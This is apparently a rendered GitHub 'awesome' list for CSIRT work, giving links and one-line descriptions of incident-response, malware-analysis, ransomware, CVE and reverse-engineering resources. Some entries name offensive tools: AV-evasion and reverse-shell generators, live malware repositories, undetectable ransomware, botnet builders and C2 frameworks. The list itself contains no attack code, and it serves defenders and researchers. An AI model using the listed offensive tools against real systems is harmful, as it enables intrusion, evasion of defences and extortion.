awesome-csirt
CSIRT resource hub
A curated list of links and resources for security professionals to stay informed on CSIRT daily activities and security best practices.
Awesome CSIRT is an curated list of links and resources in security and CSIRT daily activities.
467 stars
36 watching
85 forks
Language: C
last commit: about 2 months ago awesomeawesome-listcsirtcveexfiltrationexploitsmalware-analysispentestingpocreverse-engineeringsecure-programmingsecuritythreat-intelligence
CSIRT / Books | |||
| here | 467 | about 2 months ago | Nice list by |
| Practical Cryptography for Developers | , | ||
| The Book of Secret Knowledge | 149,254 | 3 days ago | |
| Security Engineering | — Third Edition | ||
| The Cyber Plumber's Handbook | |||
CSIRT / Links | |||
| FIRST | |||
CSIRT / Links / FIRST | |||
| Malware Analysis Resources | |||
CSIRT / Links | |||
| Cert.BR | useful | ||
CSIRT / Links / Cert.BR | |||
| 7º Fórum Brasileiro de CSIRTs | |||
| 9º Fórum Brasileiro de CSIRTs | |||
CSIRT / Links | |||
| Downloads | SANS Pen-Testing Resources: | ||
| list | 467 | about 2 months ago | Some of security projects |
| APT & CyberCriminal Campaign Collection | 3,723 | 4 months ago | |
| Encoding vs. Encryption vs. Hashing vs. Obfuscation | |||
| Shodan | : is the world's first search engine for Internet-connected devices | ||
| CriminalIP | : Criminal IP is a specialized Cyber Threat Intelligence (CTI) search engine that allows users to search for various security-related information such as malicious IP addresses, domains, banners, etc. It can be widely integrated | ||
| hacking-tutorials | 326 | over 3 years ago | |
| crypto | 512 | 12 months ago | : Lecture notes for a course on cryptography |
| tink | 13,499 | 7 months ago | : Tink is a multi-language, cross-platform library that provides cryptographic APIs that are secure, easy to use correctly, and hard(er) to misuse |
| SPLOITUS | : Exploit search engine | ||
| Vulmon | : Vulmon is a vulnerability search engine | ||
| CIS SecureSuite® Membership | |||
| CRYPTO101 | : Crypto 101 is an introductory course on cryptography, freely available for programmers of all ages and skill levels | ||
| SMHasher | 1,850 | about 1 month ago | is a test suite designed to test the distribution, collision, and performance properties of non-cryptographic hash functions |
| CPDoS | : Cache Poisoned Denial of Service | ||
| cacao | 28 | 10 months ago | : OASIS CACAO TC: Official repository for work of the |
| cti-documentation | 94 | 25 days ago | |
| The 4th in the 5th: Temporal Aspects of Cyber Operations | |||
| SOCless | : | ||
| Open CSIRT Foundation | and | ||
| Global Forum on Cyber Expertise (GFCE) | |||
| Ten strategies of a world-class cybersecurity operations center | |||
| my-infosec-awesome | 1,062 | 7 months ago | |
| How to Secure Anything | 9,941 | over 1 year ago | . How to systematically secure anything: a repository about security engineering |
| Metasploitable3 | 4,764 | 5 months ago | : is a VM that is built from the ground up with a large amount of security vulnerabilities |
| Institute for Security and Technology | : builds solutions to enhance the security of the global commons. Our goal is to provide the tools and insights needed for companies and governments to outpace emerging global security threats. Our non-traditional approach has a bias towards action, as we build trust across domains, provide unprecedented access, and deliver and implement solutions | ||
| NIST'S CYBERSECURITY FRAMEWORK | |||
| pluto-eris | 33 | over 3 years ago | : Generator and supporting evidence for security of the Pluto/Eris half-pairing cycle of elliptic curves |
| cset | 1,456 | 7 days ago | : Cybersecurity Evaluation Tool by CISA.gov |
| comply | 1,319 | over 2 years ago | : Compliance automation framework, focused on SOC2 |
| Illustrated X.509 Certificate | |||
| Open Security Controls Assessment Language (OSCAL) | 674 | 7 days ago | : NIST is developing the Open Security Controls Assessment Language (OSCAL), a set of hierarchical, XML-, JSON-, and YAML-based formats that provide a standardized representations of information pertaining to the publication, implementation, and assessment of security controls |
| DWF | : The DWF Identifiers dataset, distributed weakness filing | ||
| OASIS Common Security Advisory Framework (CSAF) | |||
| notrandom | 71 | over 2 years ago | : reverse the Mersenne Twister |
| OpenEX | : Crisis drills planning platform | ||
| NCSI | : The National Cyber Security Index is a global index, which measures the preparedness of countries to prevent cyber threats and manage cyber incidents | ||
| THE EVOLUTION OF TRUST | |||
CSIRT / Links / Incident Response | |||
| Applying DevOps Principles in Incident Response | |||
| Pagerduty Incident Response | : This documentation covers parts of the PagerDuty Incident Response process | ||
CSIRT / Links / Incident Response / Pagerduty Incident Response | |||
| security-training | 411 | over 1 year ago | : Public version of PagerDuty's employee security training courses |
| incident-response-docs | 1,022 | about 1 year ago | : PagerDuty's Incident Response Documentation |
CSIRT / Links / Incident Response | |||
| global-irt | 64 | 11 months ago | : Global IRT (Incident Response Team) is a project to describe common IRT and abuse contact information |
| atc-react | 613 | over 2 years ago | : A knowledge base of actionable Incident Response techniques |
| Request Tracker for Incident Response | |||
| Request Tracker | |||
| Beagle | 1,272 | almost 2 years ago | is an incident response and digital forensics tool which transforms security logs and data into graphs |
| CSIRT Schiltron: Training, Techniques, and Talent | |||
| Practical Tabletop Drills for CSIRTS - Pre-session Material | |||
| DFIRTrack | 482 | 3 months ago | : The Incident Response Tracking Application |
| FIR | 1,734 | 23 days ago | (Fast Incident Response): is an cybersecurity incident management platform designed with agility and speed in mind |
| Aurora Incident Response | 766 | about 1 year ago | : Incident Response Documentation made easy. Developed by Incident Responders for Incident Responders |
| timesketch | 2,615 | 14 days ago | : Collaborative forensic timeline analysis |
| FastIR Collector Linux | 173 | almost 4 years ago | (no longer maintained) |
| Critical Log Review Checklist for Security Incidents | |||
| Exercise in a Box | |||
| Incident response overview | |||
| How to Write and Execute Great Incident Response Playbooks | |||
| Incident Response: Windows Cheatsheet | |||
| Incident Response: Windows Account Logon and logon Events | |||
| Incident Response: Windows Account Management Event (Part 2) | |||
| Incident Response- Linux Cheatsheet | |||
| Building Better CSIRTs Using Behavioral Psychology | |||
| The features all Incident Response Plans need to have | |||
| Maltrail | 6,535 | 5 days ago | : Malicious traffic detection system |
CSIRT / Links / Hashing | |||
| MD5 Decryption | |||
| SHA-1 is a Shambles | : First Chosen-Prefix Collision on SHA-1 and Application to the PGP Web of Trust | ||
| Sha256 Algorithm Explained | |||
CSIRT / CVEs | |||
| here | 467 | about 2 months ago | Some CVEs stuff and links and in |
| MikroTik | search on shodan | ||
| TROMMEL | 6 | over 6 years ago | : Sift Through Directories of Files to Identify Indicators That May Contain Vulnerabilities |
| cve_manager | 75 | almost 3 years ago | : A python script that a) parses NIST NVD CVEs, b) prcoesses and exports them to CSV files, c) creates a postgres database and imports all the data in it, d) provides query capabilities for this CVEs database |
| dorkbot | 512 | 4 months ago | : Command-line tool to scan Google search results for vulnerabilities |
| NotQuite0DayFriday | 794 | over 2 years ago | : This is a repo which documents real bugs in real software to illustrate trends, learn how to prevent or find them more quickly |
| Exploit Prediction Scoring System (EPSS) | : The Exploit Prediction Scoring System (EPSS) is an open, data-driven effort for predicting when software vulnerabilities will be exploited. Our goal is to assist network defenders to better prioritize vulnerability remediation efforts | ||
| CVE PoC | 6,580 | 5 days ago | : Almost every publicly available CVE PoC |
CSIRT / Malware Analysis | |||
| Awesome Malware Analysis | 11,989 | 6 months ago | : A curated list of awesome malware analysis tools and resources |
| course | Great online by | ||
| CS6038/CS5138 Malware Analysis, UC | : | ||
| list | 467 | about 2 months ago | Some other botnets |
| IKARUS anti.virus and its 9 exploitable kernel vulnerabilities | |||
| Digital Certificates Used by Malware | |||
| Signed Malware – The Dataset | |||
| Malware Sample Sources for Researchers | |||
| Indicators: Champing at the Cyberbit | 266 | about 4 years ago | |
| Limon - Sandbox for Analyzing Linux Malwares | 389 | over 8 years ago | |
| A Dynamic Binary Instrumentation framework based on LLVM | 1,417 | 23 days ago | |
| Framework for building Windows malware, written in C++ | 504 | almost 4 years ago | |
| binary ninja | |||
| OSX/MaMi | Analyzing a New macOS DNS Hijacker: | ||
| al-khaser | 5,919 | about 2 months ago | A PoC "malware" application with good intentions that aims to stress your anti-malware system: |
| mal100.evad.spre.rans.spyw.troj.winEXE@34/9@31/10 | Great analysis of | ||
| Chaos: a Stolen Backdoor Rising Again | |||
| Malware Indicators of Compromise (IOCs) | 10 | over 1 year ago | |
| Puszek | 156 | almost 7 years ago | : Yet another LKM rootkit for Linux. It hooks syscall table |
| Joe Sandbox Cloud | 63 | 7 months ago | is a deep malware analysis platform which detects malicious files - API Wrapper |
| Cuckoo Sandbox | : Automated Malware Analysis | ||
| CBG | 4 | about 5 years ago | : Cuckoo Breeding Ground Hash Table |
| EternalGlue part two: A rebuilt NotPetya gets its first execution outside of the lab | |||
| Malware web and phishing investigation | by Decent Security | ||
| A collection of tools for working with TrickBot | 198 | about 7 years ago | |
| Forgot About Default Accounts? No Worries, GoScanSSH Didn’t | |||
| makin | 732 | over 5 years ago | reveal anti-debugging and anti-VM tricks |
| TESSERACT: Eliminating Experimental Bias in Malware Classification across Space and Time | |||
| colental/byob: BYOB (Build Your Own Botnet) | 8,989 | 28 days ago | , another |
| Source Code for Exobot Android Banking Trojan Leaked Online | |||
| Ramnit’s Network of Proxy Servers | |||
| snake | 217 | over 1 year ago | : a malware storage zoo |
| A malware analysis kit for the novice | |||
| malware-ioc | 1,647 | 10 days ago | : Indicators of Compromises (IOC) of our various investigations |
| pftriage | 77 | over 4 years ago | : Python tool and library to help analyze files during malware triage and analysis |
| imaginaryC2 | 443 | about 2 years ago | : Imaginary C2 is a python tool which aims to help in the behavioral (network) analysis of malware. Imaginary C2 hosts a HTTP server which captures HTTP requests towards selectively chosen domains/IPs. Additionally, the tool aims to make it easy to replay captured Command-and-Control responses/served payloads |
| When a malware is more complex than the paper. | |||
| Vba2Graph | 274 | almost 3 years ago | : Vba2Graph - Generate call graphs from VBA code, for easier analysis of malicious documents |
| malwoverview | 2,967 | 9 days ago | : Malwoverview.py is a first response tool to perform an initial and quick triage on either a directory containing malware samples or a specific malware sample |
| Gh0st | SECT CTF 2018 :: , More Smoked Leet Chicken | ||
| What you need to know about “LoJax”—the new, stealthy malware from Fancy Bear | |||
| Linux.Malware | 2 | almost 3 years ago | : Additional Material for the Linux Malware Paper |
| PHP Malware Examination | |||
| Analysis of Linux.Haikai | : inside the source code | ||
| Cylance vs. MBRKiller Wiper Malware | |||
| Deep Analysis of TrickBot New Module pwgrab | |||
| multiscanner | 617 | about 5 years ago | : Modular file scanning/analysis framework |
| FCL | 462 | over 3 years ago | : FCL (Fileless Command Lines) - Known command lines of fileless malicious executions |
| Mac malware combines EmPyre backdoor and XMRig miner | |||
| The Full Guide Understanding Fileless Malware Infections | |||
| 'Injection' Without Injection | |||
| Analysis of Neutrino Bot Sample | (dated 2018-08-27): In this post I analyze a Neutrino Bot sample | ||
| pafish | 3,409 | 5 months ago | : Pafish is a demonstration tool that employs several techniques to detect sandboxes and analysis environments in the same way as malware families do |
| Thunderstrike2 details | : This is the annotated transcript of our DefCon 23 / BlackHat 2015 talk, which presented the full details of Thunderstrike 2, the first firmware worm for Apple's Macs that can spread via both software or Thunderbolt hardware accessories and writes itself to the boot flash on the system's motherboard | ||
| Malboxes | : a Tool to Build Malware Analysis Virtual Machines, | ||
| Triton is the world’s most murderous malware, and it’s spreading | |||
| Cloak and Dagger — Mobile Malware Techniques Demystified | |||
| IceBox | 558 | almost 3 years ago | : Icebox is a Virtual Machine Introspection solution that enable you to stealthily trace and debug any process (kernel or user). It's based on project Winbagility |
CSIRT / Malware Analysis / Malware Development: | |||
| Welcome to the Dark Side: Part 1 | |||
| Welcome to the Dark Side: Part 2-1 | |||
| Welcome to the Dark Side: Part 2-2 | |||
| Welcome to the Dark Side: Part 3 | |||
| Welcome to the Dark Side: Part 4 | |||
CSIRT / Malware Analysis | |||
| Command and Control via TCP Handshake | |||
| wdeQEksXgm | Joel Sandbox Analysis Report | ||
| emotet | : | ||
| Aleph | 158 | over 3 years ago | : OpenSource /Malware Analysis Pipeline System |
| Aleph | 2 | almost 2 years ago | : File Analysis Pipeline |
| Anti-VM Technique with MSAcpi_ThermalZoneTemperature | , | ||
| AMSI as a Service | — Automating AV Evasion: AMSI, the “AntiMalware Scan Interface”, has been around for some time. In a broad sense, it’s a component of Windows 10 which allows applications to integrate with AV products, though most people know it for it’s ability to make file-less malware visible to AV engines | ||
| A collection of x64dbg scripts | 500 | 5 months ago | . Feel free to submit a pull request to add your script |
| CAPA | 4,885 | 3 days ago | : The FLARE team's open-source tool to identify capabilities in executable files |
| DRAKVUF Sandbox | 1,061 | 25 days ago | automated hypervisor-level malware analysis system |
| Unprotect | : The about Malware Evasion Techniques | ||
| HiJackThis Fork v3 | 699 | 7 months ago | : A free utility that finds malware, adware and other security threats |
| FRITZFROG | : A NEW GENERATION OF PEER-TO-PEER BOTNETS | ||
| Tracking A Malware Campaign Through VT | |||
| speakeasy | 1,515 | 7 months ago | : Windows kernel and user mode emulation |
| malware analysis and machine learning | |||
| GhostDNSbusters | : Illuminating GhostDNS Infrastructure | ||
| The Tetrade | : Brazilian banking malware goes global | ||
| Is macOS under the biggest malware attack ever? | : EvilQuest/ThiefQuest malware | ||
| Hybrid Analysis | |||
| Part 1: The Black-Box Approach | Evading Static Machine Learning Malware Detection Models – | ||
| ember | 949 | about 16 hours ago | : The EMBER dataset is a collection of features from PE files that serve as a benchmark dataset for researchers |
| Complementar resources to follow the EHREM course by GoHacking (Malware Reverse Engineering) | 2 | about 4 years ago | |
| Coldfire | 934 | 8 months ago | : Golang malware development library |
| pei | 30 | about 3 years ago | , the PE Injector - Inject code on 32-bit and 64-bit PE executables |
| The Art Of Mac Malware: Analysis | |||
| Freki | 422 | 10 months ago | :  Malware analysis platform |
| Ten process injection techniques: A technical survey of common and trending process injection techniques | |||
| Sandbox detection and evasion techniques. How malware has evolved over the last 10 years | |||
| malware_training_vol1 | 1,938 | 5 months ago | : Materials for Windows Malware Analysis training (volume 1) |
| Go Assembly on the arm64 | |||
| Exploit Kit still sharpens a sword | |||
| Pingback | : Backdoor At The End Of The ICMP Tunnel | ||
| WinAPI-Tricks | : Collection of various WINAPI tricks / features used or abused by Malware | ||
| pyWhat | 6,651 | about 1 year ago | : Identify anything. pyWhat easily lets you identify emails, IP addresses, and more. Feed it a .pcap file or some text and it'll tell you what it is! |
| Transacted Hollowing | 521 | 9 months ago | : a PE injection technique, hybrid between ProcessHollowing and ProcessDoppelgänging |
| Cuckoo Sandbox Overview | |||
| Malvuln | : Finding and exploiting vulnerable Malware | ||
| Machine Learning for Static Malware Analysis, with University College London | |||
| Malware Scarecrow | 379 | about 4 years ago | |
| Vigilante malware rats out software pirates while blocking ThePirateBay | |||
| Necro Python bot adds new exploits and Tezos mining to its bag of tricks | |||
| Too Log; Didn't Read — Unknown Actor Using CLFS Log Files for Stealth | : The Mandiant Advanced Practices team recently discovered a new malware family we have named PRIVATELOG and its installer, STASHLOG | ||
| Made in China: OSX.ZuRu | : trojanized apps spread malware, via sponsored search results | ||
| DBatLoader: Abusing Discord to Deliver Warzone RAT | |||
| Siloscape | : First Known Malware Targeting Windows Containers to Compromise Cloud Environments | ||
| DRIDEX | : Analysing API Obfuscation Through VEH | ||
| The Return of the Malwarebytes Crackme | , : Writeup and scripts for the 2021 malwarebytes crackme | ||
| Corvus | : is a dynamic analysis system for malware targeting Windows, Linux, Android and PDFs. Behavioral heuristics are also applied to identify suspicious activities exhibited by unknown programs | ||
| MalAPI.io | maps Windows APIs to common techniques used by malware | ||
| Malicious Document Analysis: Example 1 | |||
| APIVADS | : A Novel Privacy-Preserving Pivot Attack Detection Scheme Based On Statistical Pattern Recognition | ||
| A new secret stash for “fileless” malware | |||
| Qu1cksc0pe | 1,320 | 8 days ago | : All-in-One malware analysis tool |
CSIRT / Malware Analysis / Web Malwares | |||
| Boa release | is an experimental Javascript lexer, parser and compiler written in Rust | ||
| midrashim | 41 | about 3 years ago | : x64 ELF infector written in Assembly |
| d0zer | 206 | about 1 year ago | : Elf binary infector written in Go |
| New evasion techniques found in web skimmers | |||
| digital skimming / #magecart technique for injecting convincing PayPal iframes into the checkout process | . , , , , | ||
CSIRT / Malware Analysis / Malware Samples | |||
| Automated Malware Analysis Report for D6pnpvG2z7 | Generated by Joe Sandbox | ||
| Mac Malware | |||
| virii | 603 | almost 3 years ago | : Collection of ancient computer virus source codes |
| Detricking TrickBot Loader | : TrickBot (TrickLoader) is a modular financial malware that first surfaced in October in 20161. Almost immediately researchers have noticed similarities with a credential-stealer called Dyre. It is still believed that those two families might’ve been developed by the same actor. , | ||
| Analysis of Emotet v4 | |||
| abuse.ch Feodo Tracker Botnet C2 IP Blocklist | |||
| simple_ransomware | 8 | over 5 years ago | : this script isn't ransomware, it's just script collect all your system files and encrypt it, Can be considered it a simple ransomware |
| Mirai "Batkek" | |||
| FinFisher Filleted 🐟 | , a triage of the FinSpy (macOS) malware | ||
| Ryuk’s Return | |||
| Ryuk Ransomware | : Extensive Attack Infrastructure Revealed | ||
| Collaboration between FIN7 and the RYUK group, a Truesec Investigation | |||
| Android-Malware-Samples | 38 | over 7 years ago | : Android Malware Samples |
| Architecture of a ransomware | |||
| TRAFFIC ANALYSIS EXERCISE - OMEGACAST | |||
| Malware Samples | 1,478 | 10 months ago | : Malware samples and other artifacts |
| After finding skimmers in SVG files last week, we now discovered a #magecart skimmer in perfectly valid CSS. | |||
| #Buer #BuerLoader | |||
| SoReL-20M | 638 | over 3 years ago | : Sophos-ReversingLabs 20 million sample dataset |
| minizinh0-FUD | 368 | about 3 years ago | : A Fully Undetectable Ransomware |
| Purple Fox Rootkit Now Propagates as a Worm | |||
| How to analyze mobile malware: a Cabassous/FluBot Case study | |||
| Malware Analysis of a Password Stealer | : n this video we dive into the analysis of Poulight malware, which is a .net based password stealer | ||
| Guildma | |||
| Darkside RaaS in Linux version | |||
CSIRT / Malware Analysis / Repos | |||
| A repository of LIVE malwares for your own joy and pleasure | 11,340 | 6 months ago | : |
| malware.one | is a binary substring searchable malware catalog containing terabytes of malicious code | ||
| Beginner Malware Reversing Challenges | , by MalwareTech | ||
| MalwareWorld | : Check for Suspicious Domains and IPs. Repo: : System based on +500 blacklists and 5 external intelligences to detect internet potencially malicious hosts | ||
| C2Matrix | : The goal of this site is to point you to the best C2 framework for your needs based on your adversary emulation plan and the target environment | ||
| LOLBITS | 214 | almost 2 years ago | : C2 framework that uses Background Intelligent Transfer Service (BITS) as communication protocol and Direct Syscalls + Dinvoke for EDR user-mode hooking evasion |
| MalwareBazaar | : is a project from abuse.ch with the goal of sharing malware samples with the infosec community, AV vendors and threat intelligence providers | ||
| What is MWDB Core? | : Malware repository component for samples & static configuration with REST API interface | ||
| Malpedia | : The primary goal of Malpedia is to provide a resource for rapid identification and actionable context when investigating malware. Openness to curated contributions shall ensure an accountable level of quality in order to foster meaningful and reproducible research | ||
CSIRT / Malware Analysis / Ransomwares | |||
| Ransomware decryption tool | 8 | almost 7 years ago | |
| Schroedinger’s Pet(ya) | |||
| Player 3 Has Entered the Game: Say Hello to 'WannaCry' | |||
| WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm | |||
| Ransomware Overview | |||
| Analyzing GrandSoft Exploit Kit | and | ||
| Rapidly Evolving Ransomware GandCrab Version 5 Partners With Crypter Service for Obfuscation | |||
| hidden-tear | 729 | over 4 years ago | : It's a ransomware-like file crypter sample which can be modified for specific purposes |
| Tracking REvil | : This blog describes our efforts in tracking the REvil ransomware and its affiliates for the past six months. REvil has been around since 2019 and is one of the top variants of ransomware causing havoc at many organizations around the globe ever since. The KPN Security Research Team was able to acquire C2 sinkholes allowing for the tracking of infections across the globe | ||
| Sodinokibi (aka REvil) Ransomware | |||
| REvil Master Key for Kaseya Attack Posted to XSS | |||
| After the ransom was paid, the attackers even provided some bonus security advice! | |||
| Phirautee | 117 | over 4 years ago | : A proof of concept crypto virus to spread user awareness about attacks and implications of ransomwares. Phirautee is written purely using PowerShell and does not require any third-party libraries. This tool steals the information, holds an organisation’s data to hostage for payments or permanently encrypts/deletes the organisation data |
| Sophisticated new Android malware marks the latest evolution of mobile ransomware | |||
| Raccine | 944 | about 1 year ago | : A Simple Ransomware Vaccine |
| Genetic Analysis of CryptoWall Ransomware | |||
| Brazilian Justice Court Ransomware: Another piece in the Puzzle | |||
| A Ransomware has landed! @Embraer | by SECRET | ||
| RANSOMWARE GUIDANCE AND RESOURCES | |||
| No More Ransom! | |||
| PYSA/Mespinoza Ransomware | |||
| PYSA Ransomware | |||
| Mespinoza Analysis — New ransomware variant targets France | |||
| Some #PYSA / #Mespinoza #Ransomware Samples | |||
| Cerber Ransomware | |||
| RansomEXX Trojan attacks Linux systems | |||
| FIN7 - Lizar client Interface version 2.0.4 | |||
| Introducing COLT – Compromise to Leak Time | |||
| RANSOM MAFIA.ANALYSIS OF THE WORLD’S FIRST RANSOMWARE CARTEL | |||
| Sleuthing DarkSide Crypto-Ransom Payments with the Wolfram Language | |||
| Apostle Ransomware Analysis | |||
| From Wiper to Ransomware | The Evolution of Agrius | |||
| Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise | |||
| Hades Ransomware Operators Use Distinctive Tactics and Infrastructure | |||
| Miscellaneous Malware RE | 195 | over 2 years ago | |
| BlackMatter x64 Linux Variant | esxcli variant | , | ||
| Teaching an Old Dog New Tricks: 2017 Magniber Ransomware Uses PrintNightmare Vulnerability to Infect Victims in South Korea | |||
| RansomExx Renner | |||
| RANSOMWHERE | : Total tracked ransomware payments all time. Ransomwhere is the open, crowdsourced ransomware payment tracker. Browse and download ransomware payment data or help build our dataset by reporting ransomware demands you have received | ||
| BlackByteDecryptor | 64 | about 3 years ago | : This is a decryptor for the ransomware BlackByte |
| Ransomware Actor Abuses Genshin Impact Anti-Cheat Driver to Kill Antivirus | : We investigate mhyprot2.sys, a vulnerable anti-cheat driver for the popular role-playing game Genshin Impact. The driver is currently being abused by a ransomware actor to kill antivirus processes and services for mass-deploying ransomware | ||
CSIRT / Malware Analysis / Virus/Anti-Virus | |||
| Avast open-sources its machine-code decompiler | |||
| Morris worm | 590 | almost 4 years ago | |
| make a process unkillable?! | (windows 10) | ||
| Attack inception | : Compromised supply chain within a supply chain poses new risks – Microsoft Secure | ||
| Curtis' Blog: Bypassing Next Gen AV During a Pentest | |||
| Inception | 368 | 9 months ago | : Provides In-memory compilation and reflective loading of C# apps for AV evasion |
| Invoke-NeutralizeAV | 41 | almost 6 years ago | : Quick PoC I Wrote for Bypassing Next Gen AV Remotely for Pentesting |
| BinariesThatDoesOtherStuff | |||
| Circlean | 454 | over 1 year ago | : USB key cleaner |
| The ELF Virus Writing HOWTO | |||
| mcreator | 146 | over 4 years ago | : Encoded Reverse Shell Generator With Techniques To Bypass AV's |
| metame | 569 | about 5 years ago | : is a simple metamorphic code engine for |
| rustdsplit | 35 | over 4 years ago | : At some point, I learned about a method to perform a binary search on a file in order to identify its AV signature and change it to bypass signature-based AV. The tool I used back then is gone, so I wrote this |
| Virus Total API in Python | 1 | almost 4 years ago | |
| VirusTotal CLI | 836 | 3 months ago | |
| rustdsplit | 35 | over 4 years ago | : At some point, I learned about a method to perform a binary search on a file in order to identify its AV signature and change it to bypass signature-based AV. The tool I used back then is gone, so I wrote this |
| Antivirus Event Analysis Cheat Sheet v1.7.2 | |||
| UglyEXe | : | ||
| How to bypass Defender in a few easy steps | |||
| Engineering antivirus evasion | |||
| avcleaner | 1,011 | over 2 years ago | : C/C++ source obfuscator for antivirus bypass |
| An Empirical Assessment of Endpoint Security Systems Against Advanced Persistent Threats Attack Vectors | |||
| VxSig | 259 | 9 months ago | : Automatically generate AV byte signatures from sets of similar binaries |
CSIRT / Malware Analysis / Trojans/Loggers | |||
| IcedID Banking Trojan Shares Code with Pony 2.0 Trojan | |||
| Turla | : In and out of its unique Outlook backdoor | ||
| QMKhuehuebr | 85 | almost 6 years ago | : Trying to hack into keyboards |
CSIRT / Malware Analysis / Malware Articles and Sources | |||
| “VANILLA” malware | : vanishing antiviruses by interleaving layers and layers of attacks | ||
| A Mix of Python & VBA in a Malicious Word Document | |||
| MalwareAnalysisForHedgehogs | : Throw your bat cape over your spikes and get started with malware analysis and reverse engineering. I work as a malware analyst and like to share my knowledge | ||
| 2020-10-22 - TRAFFIC ANALYSIS EXERCISE - OMEGACAST | |||
| EMOTET | : EMOTET INFECTIONS WITH ZEUS PANDA BANKER AND TRICKBOT (GTAG: DEL34) | ||
| A MIPS-32 ELF non-resident virus with false disassembly | , Made with love by S01den (@s01den) | ||
| Linux.Kropotkine.asm | 15,853 | about 1 month ago | |
| A WILD KOBALOS APPEARS | , Tricksy Linux malware goes after HPCs | ||
| List of victim organizations attacked by Ransomware gangs released on the DarkWeb | |||
CSIRT / Reverse Engineering | |||
| Fundamentos de Engenharia Reversa | (pt-br) | ||
| Reverse Engineer's Toolkit | 4,834 | 7 months ago | |
| Dangers of the Decompiler | |||
| RE guide for beginners: Methodology and tools | |||
| REDasm | 1,570 | 26 days ago | : Crossplatform, interactive, multiarchitecture disassembler |
| Reversing ARM Binaries | |||
| Programmer De-anonymization from Binary Executables | 86 | over 6 years ago | |
| Reverse engineering WhatsApp Web | 6,149 | 7 months ago | |
| BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts) | |||
| BOLO: Reverse Engineering — Part 2 (Advanced Programming Concepts) | |||
| Reverse Engineering for Beginners | |||
| VivienneVMM | 781 | about 4 years ago | : VivienneVMM is a stealthy debugging framework implemented via an Intel VT-x hypervisor |
| Xori | 724 | almost 2 years ago | : Custom disassembly framework |
| rattle | 350 | about 1 year ago | : Rattle is an EVM binary static analysis framework designed to work on deployed smart contracts |
| starshipraider | 144 | about 1 month ago | : High performance embedded systems debug/reverse engineering platform |
| GBA-IDA-Pseudo-Terminal | 13 | almost 5 years ago | : IDAPython tools to aid with analysis, disassembly and data extraction using IDA python commands, tailored for the GBA architecture at some parts |
| binja-ipython | 29 | over 6 years ago | : A plugin to integrate an IPython kernel into Binary Ninja |
| PySameSame | 23 | over 6 years ago | : This is a python version of samesame repo to generate homograph strings |
| Reversing a Japanese Wireless SD Card From Zero to Code Execution | |||
| Practical-Reverse-Engineering-using-Radare2 | 107 | almost 8 years ago | : Training Materials of Practical Reverse Engineering using Radare2 |
| Reverse engineering Go binaries using Radare 2 and Python | |||
| r2pipe for V | 6 | about 2 months ago | : r2pipe for V |
| radare2-webui | 94 | 3 months ago | : webui repository for radare2 |
CSIRT / Reverse Engineering / IDA Pro: | |||
| idaemu | 551 | over 2 years ago | : idaemu is an IDA Pro Plugin - use for emulating code in IDA Pro |
| lighthouse | 2,255 | 4 months ago | : Code Coverage Explorer for IDA Pro & Binary Ninja |
| IDAPro Cheat Sheet | |||
| Lumen | 931 | 21 days ago | : A private Lumina server for IDA Pro |
| EFISwissKnife | 147 | over 7 years ago | : An IDA plugin to improve (U)EFI reversing |
| IDA Python | |||
| Tenet | 1,326 | about 1 year ago | : |
| TLS callbacks | |||
| rename gamemaker handlers | 2 | about 3 years ago | |
CSIRT / Reverse Engineering / GDB: | |||
| pwndbg | 7,629 | 9 days ago | : Exploit Development and Reverse Engineering with GDB Made Easy |
| PEDA | 5,899 | 4 months ago | : Python Exploit Development Assistance for GDB |
| about gef | . : GDB Enhanced Features for exploit devs & reversers | ||
| some things about gef | |||
| Controlling GDB | |||
| Low Level Visualization via Debuggers | |||
| Faster GDB Startup | |||
CSIRT / Reverse Engineering / Frida: | |||
| Getting Started with Frida Tools | |||
| part 1 | Frida hooking android : , , , and | ||
| fridump3 | 180 | 15 days ago | : A universal memory dumper using Frida for Python 3 |
| r2flutch | 167 | over 2 years ago | : Tool to decrypt iOS apps using r2frida |
CSIRT / Reverse Engineering / Immunity: | |||
| Immunity Debugger | |||
| mona | site. : is a python script that can be used to automate and speed up specific searches while developing exploits (typically for the Windows platform). It runs on Immunity Debugger and WinDBG, and requires python 2.7. Although it runs in WinDBG x64, the majority of its features were written specifically for 32bit processes | ||
CSIRT / Reverse Engineering | |||
| LIEF | : Library to Instrument Executable Formats ( ) | ||
| DEBIN | : Predicting Debug Information in Stripped Binaries | ||
| Analyzing ARM Cortex-based MCU firmwares using Binary Ninja | |||
| Manticore | : Symbolic Execution Tool For Analysis Of Binaries And Smart Contracts. : Symbolic execution tool | ||
| Beam me up, CFG. | : Earlier in 2018 while revisiting the Delay Import Table, I used dumpbin to check the Load Configuration data of a file and noticed new fields in it. And at the time of writing this, more fields were added! The first CFGuard caught my attention and I learned about Control Flow Guard, it is a new security feature. To put it simple, it protects the execution flow from redirection - for example, from exploits that overwrite an address in the stack. Maybe they should call it the Security Directory instead | ||
| PBA - Analysis Tools | 52 | over 5 years ago | : My own versions from the programs of the book "Practical Binary Analysis" |
| functrace | 89 | over 5 years ago | : is a tool that helps to analyze a binary file with dynamic instrumentation using DynamoRIO |
| Signature-Base | 2,484 | 8 days ago | : signature-base is the signature database for my scanners LOKI and SPARK Core |
CSIRT / Reverse Engineering / Signature-Base | |||
| Generic Anomalies | 2,484 | 8 days ago | : Detects an embedded executable in a non-executable file |
CSIRT / Reverse Engineering | |||
| Virtuailor | 1,273 | over 3 years ago | : IDAPython tool for C++ vtables reconstruction |
| Linux Reverse Engineering CTFs for Beginners | |||
| execution-trace-viewer | 270 | over 3 years ago | : Tool for viewing and analyzing execution traces |
| Reverse Engineering of a Not-so-Secure IoT Device | |||
CSIRT / Reverse Engineering / ELF | |||
| Python for Reverse Engineering 1 | : ELF Binaries | ||
| The 101 of ELF files on Linux | : Understanding and Analysis - Linux Audit | ||
| On ELF, Part 1 | |||
| On ELF, Part 2 | |||
CSIRT / Reverse Engineering | |||
| Kaitai Struct | : A new way to develop parsers for binary structures | ||
| findLoop | 26 | over 5 years ago | : find possible encryption/decryption or compression/decompression code |
| Reverse Engineering 'A Link to the Past (GBA)' ep 1 | |||
| wiggle | : The concepting self hosted executable binary search engine | ||
| uncompyle6 | 3,796 | 7 days ago | : A cross-version |
| Decompyle++ | 3,361 | about 1 month ago | : C++ python bytecode disassembler and decompiler |
| bearparser | 648 | 3 months ago | |
| Reverse-engineering precision op amps from a 1969 analog computer | |||
